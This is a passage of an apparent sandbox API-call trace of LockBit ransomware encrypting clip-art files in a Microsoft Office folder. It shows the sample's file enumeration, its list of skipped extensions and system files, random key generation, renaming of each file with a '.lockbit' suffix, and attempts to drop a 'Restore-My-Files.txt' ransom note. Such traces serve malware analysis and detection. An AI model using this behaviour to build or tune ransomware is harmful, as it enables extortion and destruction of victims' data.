(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.207] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3198, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0172193.WMF", cAlternateFileName="")) returned 1 [0147.207] lstrcmpiW (lpString1=".", lpString2="J0172193.WMF") returned -1 [0147.207] lstrcmpiW (lpString1="..", lpString2="J0172193.WMF") returned -1 [0147.207] PathFindExtensionW (pszPath="J0172193.WMF") returned=".WMF" [0147.207] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.207] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.208] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.208] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.209] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0172193.WMF") returned 1 [0147.209] lstrcmpiW (lpString1="ntldr", lpString2="J0172193.WMF") returned 1 [0147.209] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0172193.WMF") returned 1 [0147.209] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0172193.WMF") returned -1 [0147.209] lstrcmpiW (lpString1="autorun.inf", lpString2="J0172193.WMF") returned -1 [0147.210] lstrcmpiW (lpString1="thumbs.db", lpString2="J0172193.WMF") returned 1 [0147.210] lstrcmpiW (lpString1="iconcache.db", lpString2="J0172193.WMF") returned -1 [0147.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned=".WMF" [0147.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.210] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.211] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.211] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.lockbit") returned 72 [0147.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0172193.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.216] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.216] malloc (_Size=0x40068) returned 0x1ff1e60 [0147.216] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12696) returned 1 [0147.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0147.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0147.218] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.221] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.221] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.222] free (_Block=0x1fa2ed8) [0147.222] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.222] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.222] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.222] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0174315.WMF", cAlternateFileName="")) returned 1 [0147.222] lstrcmpiW (lpString1=".", lpString2="J0174315.WMF") returned -1 [0147.222] lstrcmpiW (lpString1="..", lpString2="J0174315.WMF") returned -1 [0147.222] PathFindExtensionW (pszPath="J0174315.WMF") returned=".WMF" [0147.222] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.222] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.222] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.222] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.224] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.224] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0174315.WMF") returned 1 [0147.225] lstrcmpiW (lpString1="ntldr", lpString2="J0174315.WMF") returned 1 [0147.225] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0174315.WMF") returned 1 [0147.225] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0174315.WMF") returned -1 [0147.225] lstrcmpiW (lpString1="autorun.inf", lpString2="J0174315.WMF") returned -1 [0147.225] lstrcmpiW (lpString1="thumbs.db", lpString2="J0174315.WMF") returned 1 [0147.225] lstrcmpiW (lpString1="iconcache.db", lpString2="J0174315.WMF") returned -1 [0147.225] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.225] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned=".WMF" [0147.225] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.225] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.225] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0147.226] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0147.226] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.lockbit") returned 72 [0147.227] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0174315.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0147.227] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.227] malloc (_Size=0x40068) returned 0x3d70450 [0147.228] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=5864) returned 1 [0147.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.229] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.234] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.234] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.234] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.235] free (_Block=0x1fa2ed8) [0147.235] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.235] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.235] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.236] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2608, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0174635.WMF", cAlternateFileName="")) returned 1 [0147.236] lstrcmpiW (lpString1=".", lpString2="J0174635.WMF") returned -1 [0147.236] lstrcmpiW (lpString1="..", lpString2="J0174635.WMF") returned -1 [0147.236] PathFindExtensionW (pszPath="J0174635.WMF") returned=".WMF" [0147.236] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0147.236] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0147.237] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0147.237] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0147.238] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0174635.WMF") returned 1 [0147.238] lstrcmpiW (lpString1="ntldr", lpString2="J0174635.WMF") returned 1 [0147.238] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0174635.WMF") returned 1 [0147.238] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0174635.WMF") returned -1 [0147.238] lstrcmpiW (lpString1="autorun.inf", lpString2="J0174635.WMF") returned -1 [0147.238] lstrcmpiW (lpString1="thumbs.db", lpString2="J0174635.WMF") returned 1 [0147.238] lstrcmpiW (lpString1="iconcache.db", lpString2="J0174635.WMF") returned -1 [0147.238] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.238] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned=".WMF" [0147.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0147.239] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0147.239] lstrcmpiW 